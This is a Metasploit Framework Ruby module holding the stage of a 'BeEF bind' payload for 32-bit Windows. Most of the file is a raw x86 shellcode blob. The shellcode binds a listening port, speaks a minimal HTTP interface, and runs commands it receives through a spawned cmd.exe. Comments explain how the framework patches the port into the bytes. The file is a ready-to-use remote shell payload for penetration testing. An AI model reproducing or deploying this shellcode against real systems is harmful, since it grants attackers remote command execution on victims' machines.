##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

# Stage half of the BeEF bind command-shell payload for 32-bit Windows.
#
# The module carries no generated code: 'Payload' below is a fixed blob of
# x86 bytes that the framework hands to the matching 'beef_bind' stager.
# The only runtime customisation visible here is the LPORT patch described
# in 'Offsets'; everything else is shipped exactly as written.
#
# Maintainers: the blob has no assembly source on this page, so it cannot be
# audited or rebuilt from here. Any edit to the byte string must also
# recompute the LPORT offset, otherwise the wrong two bytes get patched.
module MetasploitModule
  include Msf::Payload::Windows
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] caller-supplied overrides merged into the defaults
  #   by +merge_info+ (inherited; not defined in this file).
  def initialize(info = {})
    super(merge_info(info,
                     'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
                     # Unexpanded SVN keyword left over from the original import.
                     'Version' => '$Revision: 11421 $',
                     'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
                     'Author' => ['Ty Miller'],
                     'License' => BSD_LICENSE,
                     'Platform' => 'win',
                     'Arch' => ARCH_X86,
                     'Session' => Msf::Sessions::CommandShellWindows,
                     # Pairs this stage only with stagers declaring the same convention.
                     'PayloadCompat' =>
                        {
                          'Convention' => 'beef_bind'
                        },
                     'Stage' =>
                        {
                          # LPORT is written over the two bytes at index 511 of
                          # 'Payload' using Ruby's 'n' pack directive (16-bit,
                          # network byte order). Index 511 is the byte after the
                          # "\x02\x00" pair in the "\x68\x02\x00\x11\x5c" sequence
                          # below, i.e. the default port bytes \x11\x5c.
                          'Offsets' =>
                             {
                               'LPORT' => [511, 'n']
                             },
                          # Raw x86 stage. Ten bytes per line; the final line has
                          # seven, so line k (counting from the first) starts at
                          # byte 10*(k-1). Note that the blob also embeds plain
                          # ASCII (e.g. an "HTTP/1.1 200 OK" response header and
                          # a "Content-Length: 3048" field), which is visible on
                          # the wire and worth knowing for detection/review.
                          'Payload' =>
                            "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \
                            "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \
                            "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
                            "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \
                            "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \
                            "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
                            "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
                            "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
                            "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
                            "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \
                            "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \
                            "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
                            "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \
                            "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
                            "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \
                            "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \
                            "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \
                            "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \
                            "\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \
                            "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \
                            "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \
                            "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \
                            "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \
                            "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \
                            "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \
                            "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \
                            "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \
                            "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \
                            "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \
                            "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \
                            "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \
                            "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \
                            "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \
                            "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \
                            "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \
                            "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \
                            "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \
                            "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \
                            "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \
                            "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \
                            "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \
                            "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \
                            "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
                            "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \
                            "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \
                            "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \
                            "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \
                            "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \
                            "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \
                            "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \
                            "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \
                            "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \
                            "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \
                            "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \
                            "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \
                            "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \
                            "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \
                            "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \
                            "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \
                            "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \
                            "\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \
                            "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \
                            "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \
                            "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \
                            "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \
                            "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \
                            "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \
                            "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \
                            "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \
                            "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \
                            "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \
                            "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \
                            "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \
                            "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \
                            "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \
                            "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \
                            "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \
                            "\xff\xd5\xe9\x58\xfe\xff\xff"
                        }))
  end

  # Stage encoding is safe for this payload.
  #
  # Tells the framework it may run an encoder over the stage before sending
  # it. Nothing in this file depends on the stage bytes being unencoded, and
  # the LPORT patch happens on the raw bytes before any encoding is applied
  # (framework behaviour; not shown here).
  #
  # @return [Boolean] always true
  def encode_stage?
    true
  end
end
